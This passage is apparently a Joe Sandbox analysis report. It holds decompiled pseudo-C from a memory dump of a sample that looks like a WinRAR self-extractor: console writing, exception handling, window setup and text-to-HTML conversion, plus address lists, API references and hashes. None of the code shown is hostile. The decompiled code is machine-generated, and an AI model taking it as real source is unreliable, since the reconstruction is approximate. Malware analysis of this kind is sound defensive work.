0x00a49d02
0x00a49d16
0x00a49d17
0x00a49d1c
0x00a49d1e
0x00a49d26
0x00a49ecb
0x00a49ecb
0x00a49d30
0x00a49d35
0x00a49d38
0x00a49d3a
0x00a49d3f
0x00a49ec3
0x00000000
0x00a49d45
0x00a49d45
0x00a49d48
0x00a49d4b
0x00a49d53
0x00a49d53
0x00a49d56
0x00a49d62
0x00a49d80
0x00a49d80
0x00a49d82
0x00a49d84
0x00a49db2
0x00a49db2
0x00a49db5
0x00a49db8
0x00a49dd2
0x00a49dd2
0x00a49dd7
0x00a49dda
0x00a49ddc
0x00a49ddf
0x00a49de0
0x00000000
0x00000000
0x00000000
0x00a49de0
0x00a49dba
0x00a49dbd
0x00a49dc9
0x00a49dc9
0x00a49dcc
0x00a49dcc
0x00a49dcf
0x00a49dcf
0x00000000
0x00a49dcf
0x00a49dbf
0x00a49dc1
0x00000000
0x00000000
0x00a49dc3
0x00a49dc7
0x00000000
0x00000000
0x00000000
0x00a49dc7
0x00a49d86
0x00a49d8a
0x00000000
0x00000000
0x00a49d8c
0x00a49d8c
0x00a49d8e
0x00a49d8e
0x00a49d91
0x00a49d94
0x00a49d97
0x00000000
0x00000000
0x00a49d99
0x00a49d9c
0x00a49d9e
0x00a49d9e
0x00a49da1
0x00a49da1
0x00a49da3
0x00a49da6
0x00a49da6
0x00a49dab
0x00a49dad
0x00000000
0x00000000
0x00a49db1
0x00000000
0x00a49db1
0x00a49d67
0x00a49d71
0x00a49d73
0x00a49d7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a49d73
0x00a49d6b
0x00a49d6f
0x00000000
0x00000000
0x00000000
0x00a49d6f
0x00a49dee
0x00a49df5
0x00a49df8
0x00a49dfa
0x00a49e0f
0x00a49e12
0x00a49e13
0x00a49e16
0x00a49e1a
0x00a49e1b
0x00a49e1e
0x00a49e22
0x00a49e24
0x00a49e27
0x00a49e29
0x00a49e2c
0x00a49e2c
0x00a49e2c
0x00a49e22
0x00a49e38
0x00a49e3b
0x00a49e40
0x00a49e43
0x00a49e47
0x00a49e7b
0x00a49e7d
0x00a49e80
0x00a49ea1
0x00a49ea1
0x00a49ea4
0x00a49ea9
0x00a49eab
0x00a49eab
0x00a49eae
0x00a49eae
0x00000000
0x00a49ea9
0x00a49e82
0x00a49e86
0x00a49e86
0x00a49e89
0x00a49e8c
0x00000000
0x00000000
0x00a49e8e
0x00a49e91
0x00a49e94
0x00a49e96
0x00a49e98
0x00a49e9b
0x00000000
0x00000000
0x00000000
0x00a49e9b
0x00a49e9d
0x00000000
0x00a49e49
0x00a49e49
0x00a49e4b
0x00a49e4e
0x00a49e76
0x00a49e76
0x00000000
0x00000000
0x00000000
0x00000000
0x00a49e50
0x00a49e50
0x00a49e58
0x00a49e5d
0x00a49e62
0x00000000
0x00000000
0x00a49e64
0x00a49e6c
0x00000000
0x00000000
0x00000000
0x00a49e6e
0x00a49e70
0x00a49e70
0x00a49e73
0x00000000
0x00a49e73
0x00a49eb1
0x00a49eb3
0x00a49eb6
0x00a49ebc
0x00a49ebc
0x00000000
0x00a49d53

APIs

_wcslen.LIBCMT ref: 00A49D0A

Strings

</p>, xrefs: 00A49DE8
>, xrefs: 00A49D4B
<style>, xrefs: 00A49E30
<br>, xrefs: 00A49DFE
</style>, xrefs: 00A49E52

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 3e2dfc4d84e7e45e1db135de66f39531e1c3aa8ab7dcc250546af7c1363fa506
Instruction ID: 4688859a69ff47bc29be30c5a7b7b70ef1d00877716caf92a255422f4034e5b6
Opcode Fuzzy Hash: 3e2dfc4d84e7e45e1db135de66f39531e1c3aa8ab7dcc250546af7c1363fa506
Instruction Fuzzy Hash: 2C51096EB4032395DB309B659C12B7773E0DFE5791F68081AFDC18B1C0FBA58CA18261

Uniqueness

Uniqueness Score: -1.00%

Function 00A5F68D Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E00A5F68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xa92290 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0xa92290 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E00A5A767(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0xa92290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0xa92290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xa92290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E00A5930D( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00A5930D();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									_t48 = _t130 + 8; // 0xff76e900
									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00A4FBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
			}

0x00a5f695
0x00a5f69c
0x00a5f69f
0x00a5f6a7
0x00a5f6ab
0x00a5f6b7
0x00a5f6ba
0x00a5f6bd
0x00a5f6c4
0x00a5f6cc
0x00a5f6cf
0x00a5f6d5
0x00a5f6db
0x00a5f6e0
0x00a5f6e2
0x00a5f6e5
0x00a5f6ea
0x00a5f6f4
0x00a5f6fb
0x00a5f6fe
0x00a5f705
0x00a5f70c
0x00a5f727
0x00a5f72f
0x00a5f738
0x00a5f75e
0x00a5f760
0x00000000
0x00a5f73a
0x00a5f73d
0x00a5f804
0x00a5f810
0x00a5f81b
0x00a5f820
0x00a5f743
0x00a5f74a
0x00a5f74f
0x00a5f755
0x00a5f75b
0x00000000
0x00a5f75b
0x00a5f755
0x00a5f73d
0x00a5f70e
0x00a5f712
0x00a5f715
0x00a5f71b
0x00a5f71d
0x00a5f720
0x00a5f724
0x00a5f761
0x00a5f764
0x00a5f765
0x00a5f76a
0x00a5f770
0x00a5f776
0x00a5f785
0x00a5f78b
0x00a5f791
0x00a5f796
0x00a5f7b2
0x00a5f825
0x00a5f82b
0x00a5f7b4
0x00a5f7b4
0x00a5f7bc
0x00a5f7c5
0x00a5f7cb
0x00000000
0x00a5f7cd
0x00a5f7cf
0x00a5f7d2
0x00a5f7eb
0x00000000
0x00a5f7ed
0x00a5f7f1
0x00a5f7f3
0x00a5f7f6
0x00000000
0x00a5f7f6
0x00a5f7f1
0x00a5f7eb
0x00a5f7cb
0x00a5f7c5
0x00a5f7b2
0x00a5f796
0x00a5f770
0x00000000
0x00a5f7f9
0x00a5f7f9
0x00a5f82d
0x00a5f83f

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A5FE02,00000000,00000000,00000000,00000000,00000000,00A5529F), ref: 00A5F6CF
__fassign.LIBCMT ref: 00A5F74A
__fassign.LIBCMT ref: 00A5F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A5F78B
WriteFile.KERNEL32(?,00000000,00000000,00A5FE02,00000000,?,?,?,?,?,?,?,?,?,00A5FE02,00000000), ref: 00A5F7AA
WriteFile.KERNEL32(?,00000000,00000001,00A5FE02,00000000,?,?,?,?,?,?,?,?,?,00A5FE02,00000000), ref: 00A5F7E3

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: f6dbff9f8050c9cf564c32f063c063954b4a8655cc730539a2e298be600c0f83
Instruction ID: 1280c5156ba2191ad0664acdd1838244737f3c46626bb47d39dbeaa64c455060
Opcode Fuzzy Hash: f6dbff9f8050c9cf564c32f063c063954b4a8655cc730539a2e298be600c0f83
Instruction Fuzzy Hash: 7151C5B5E00209AFCB10CFA8DC45AEEBBF4FF09301F14416AE955E7251D770AA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A52900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A52900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00A62567(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0xa6e7ac;
				E00A528C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xa6e7ac);
				E00A5396C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00A53AF0(_t77, 0xfffffffe, _t96, 0xa6e7ac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00A53A90(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00A528C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xa658dc;
											if(__eflags != 0) {
												_t72 = E00A62090(__eflags, 0xa658dc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0xa658dc; // 0xa50150
													 *0xa63278(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00A53AD0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00A53AF0(_t64, _t93, _t96, 0xa6e7ac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00A528C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00A53AB0();
										asm("int3");
										__eflags = E00A53B07();
										if(__eflags != 0) {
											_t67 = E00A52B8C(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00A53B43();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00a52900
0x00a52907
0x00a5290b
0x00a5290c
0x00a52912
0x00a5291e
0x00a52920
0x00a52926
0x00a52926
0x00a5292f
0x00a52931
0x00a52934
0x00a52937
0x00a5293f
0x00a52944
0x00a52947
0x00a5294a
0x00a52951
0x00a529ad
0x00a529b0
0x00a529b8
0x00a529bf
0x00000000
0x00a529bf
0x00000000
0x00a52953
0x00a52953
0x00a52959
0x00a5295f
0x00a52965
0x00a529d0
0x00a529d9
0x00a52967
0x00a52967
0x00a52967
0x00a5296d
0x00a52970
0x00a52973
0x00a52976
0x00a52979
0x00a5297e
0x00a52994
0x00000000
0x00a52980
0x00a52980
0x00a52982
0x00a52987
0x00a52989
0x00a5298c
0x00a5298e
0x00a529a4
0x00a529c4
0x00a529c4
0x00a529c8
0x00000000
0x00a52990
0x00a52990
0x00a529da
0x00a529dd
0x00a529e3
0x00a529e5
0x00a529ec
0x00a529f3
0x00a529f8
0x00a529fb
0x00a529fd
0x00a529ff
0x00a52a0c
0x00a52a12
0x00a52a14
0x00a52a17
0x00a52a17
0x00a52a1a
0x00a52a1a
0x00a529ec
0x00a52a20
0x00a52a22
0x00a52a27
0x00a52a2a
0x00a52a2d
0x00a52a35
0x00a52a39
0x00a52a3e
0x00a52a3e
0x00a52a41
0x00a52a45
0x00a52a48
0x00a52a55
0x00a52a58
0x00a52a5d
0x00a52a63
0x00a52a65
0x00a52a6a
0x00a52a6f
0x00a52a71
0x00a52a7c
0x00a52a73
0x00a52a73
0x00000000
0x00a52a73
0x00a52a67
0x00a52a67
0x00a52a67
0x00a52a69
0x00a52a69
0x00a52992
0x00000000
0x00a52992
0x00a52990
0x00a5298e
0x00000000
0x00a52997
0x00a52997
0x00a52999
0x00a529a0
0x00000000
0x00a529a2
0x00000000
0x00a529a0
0x00a52965
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00A52937
___except_validate_context_record.LIBVCRUNTIME ref: 00A5293F
_ValidateLocalCookies.LIBCMT ref: 00A529C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00A529F3
_ValidateLocalCookies.LIBCMT ref: 00A52A48

Strings

csm, xrefs: 00A529DD

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3c9a8df34b16a09dfad5e8e7c54c70b2db34986b2f98d4d74534885e30521506
Instruction ID: e744c22d984cf38f642b499565208a3b2bd8dbb5fa864052ce84b5de2759e03a
Opcode Fuzzy Hash: 3c9a8df34b16a09dfad5e8e7c54c70b2db34986b2f98d4d74534885e30521506
Instruction Fuzzy Hash: B041BF35A00208EFCF10DF68C881B9EBBB0BF46365F148155EC15AB392D7719A19CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A49ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00A49ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E00A49C04(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L00A53E2E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E00A57625(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E00A57625(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0xa93108(0,  *0xa93154(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0xa93110( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0xa93118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xa93154(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0xa9310c( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E00A49CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
								SetWindowTextW(_t68, _t67);
								return L00A53E2E(_t67);
							}
						}
					}
				}
				return _t44;
			}

0x00a49ede
0x00a49ee2
0x00a49ee8
0x00a49eeb
0x00a49eee
0x00a49efa
0x00a49f03
0x00a49f08
0x00a49f0d
0x00a49f13
0x00a49f19
0x00a49f1d
0x00a49f15
0x00a49f15
0x00a49f15
0x00a49f28
0x00a49f2b
0x00a49f31
0x00a49f35
0x00a49f2d
0x00a49f2d
0x00a49f2d
0x00a49f3b
0x00a49f44
0x00a49f5b
0x00a49f65
0x00a49f6a
0x00a49f6a
0x00a49f70
0x00a49f7e
0x00a49fab
0x00a49fb1
0x00a49fb8
0x00a49ff2
0x00a49ff4
0x00a49ff9
0x00000000
0x00a4a002
0x00a49fba
0x00a49fbc
0x00a49fc3
0x00a49fc6
0x00a49fcd
0x00a49fd2
0x00a49fd6
0x00a49fdb
0x00a49fe3
0x00000000
0x00a49fef
0x00a49fd6
0x00a49fc6
0x00a49fbc
0x00a4a00e

APIs

ShowWindow.USER32(?,00000000), ref: 00A49EEE
GetWindowRect.USER32(?,00000000), ref: 00A49F44
ShowWindow.USER32(?,00000005,00000000), ref: 00A49FDB
SetWindowTextW.USER32(?,00000000), ref: 00A49FE3
ShowWindow.USER32(00000000,00000005), ref: 00A49FF9

Strings

RarHtmlClassName, xrefs: 00A49FA5

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 96cfa142ccb7362c33b96b2fe40f608df22ab7213f8fdb59bd2e0e283303f9b2
Instruction ID: efd5513f552b845d26f955a2c98106392f2a5d58e286cbdeec235bffb0e8e7b4
Opcode Fuzzy Hash: 96cfa142ccb7362c33b96b2fe40f608df22ab7213f8fdb59bd2e0e283303f9b2
Instruction Fuzzy Hash: 6041A236208210AFCF219FA59C49B6B7BB8FF88701F10465AF9469A166CB34DD19CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A49955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A49955(void* __edx, void* __eflags) {
				void* __ecx;
				signed int _t25;
				void* _t29;
				signed int _t30;
				intOrPtr _t31;
				void* _t35;
				signed int _t38;
				signed int _t45;
				void* _t51;
				signed short* _t52;
				void* _t53;
				signed short* _t55;
				signed short* _t57;
				signed short* _t58;
				void* _t59;
				void* _t60;

				_t57 =  *(_t59 + 0x10);
				_push(0x200 + E00A53E13(_t57) * 0xc);
				_t52 = E00A53E33(0x200 + E00A53E13(_t57) * 0xc);
				 *(_t59 + 0x10) = _t52;
				if(_t52 != 0) {
					E00A56066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
					_t38 = E00A53E13(_t52);
					_t60 = _t59 + 0xc;
					_t25 =  *_t57 & 0x0000ffff;
					_t55 = _t57;
					if(_t25 == 0) {
						L19:
						_t52[_t38] = 0;
						L00A53E2E(_t57);
						return _t52;
					}
					_t45 = _t25;
					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
					_t29 = 0xd;
					_t51 = 0xa;
					do {
						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
							if(_t55 <= _t57) {
								L17:
								_t52[_t38] = _t45;
								_t38 = _t38 + 1;
								goto L18;
							}
							_t31 =  *((intOrPtr*)(_t60 + 0x14));
							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
								goto L17;
							} else {
								E00A56066( &(_t52[_t38]), L"&nbsp;");
								_t38 = _t38 + 6;
								goto L16;
							}
						} else {
							_t58 =  &(_t52[_t38]);
							_t53 = 0xa;
							while(_t55[3] == _t53) {
								E00A56066(_t58, L"<br>");
								_t55 =  &(_t55[2]);
								_t38 = _t38 + 4;
								_t35 = 0xd;
								_t58 =  &(_t58[4]);
								if(_t55[2] == _t35) {
									continue;
								}
								break;
							}
							_t52 =  *(_t60 + 0x10);
							_t55 =  &(_t55[1]);
							_t57 =  *(_t60 + 0x1c);
							L16:
							_t51 = 0xa;
						}
						L18:
						_t55 =  &(_t55[1]);
						_t30 =  *_t55 & 0x0000ffff;
						_t45 = _t30;
						_t29 = 0xd;
					} while (_t30 != 0);
					goto L19;
				}
				return _t57;
			}

0x00a49958
0x00a4996c
0x00a49972
0x00a49974
0x00a4997c
0x00a4998d
0x00a49998
0x00a4999a
0x00a4999d
0x00a499a1
0x00a499a6
0x00a49a4f
0x00a49a52
0x00a49a56
0x00000000
0x00a49a5f
0x00a499ae
0x00a499b0
0x00a499b8
0x00a499bb
0x00a499bc
0x00a499bf
0x00a49a0d
0x00a49a36
0x00a49a36
0x00a49a3a
0x00000000
0x00a49a3a
0x00a49a0f
0x00a49a16
0x00000000
0x00a49a1e
0x00a49a27
0x00a49a2e
0x00000000
0x00a49a2e
0x00a499d3
0x00a499d5
0x00a499d8
0x00a499d9
0x00a499e5
0x00a499ec
0x00a499ef
0x00a499f4
0x00a499f5
0x00a499fc
0x00000000
0x00000000
0x00000000
0x00a499fc
0x00a499fe
0x00a49a02
0x00a49a05
0x00a49a31
0x00a49a33
0x00a49a33
0x00a49a3b
0x00a49a3b
0x00a49a40
0x00a49a43
0x00a49a48
0x00a49a48
0x00000000
0x00a499bc
0x00000000

APIs

_wcslen.LIBCMT ref: 00A4995E
_wcslen.LIBCMT ref: 00A49993

Strings

 , xrefs: 00A49A21
, xrefs: 00A499B0
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00A49987
<br>, xrefs: 00A499DF

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 59a1ece60c6b263626e382ee9a1fe342809918f083d9c77cd9c5a85cb6724ea9
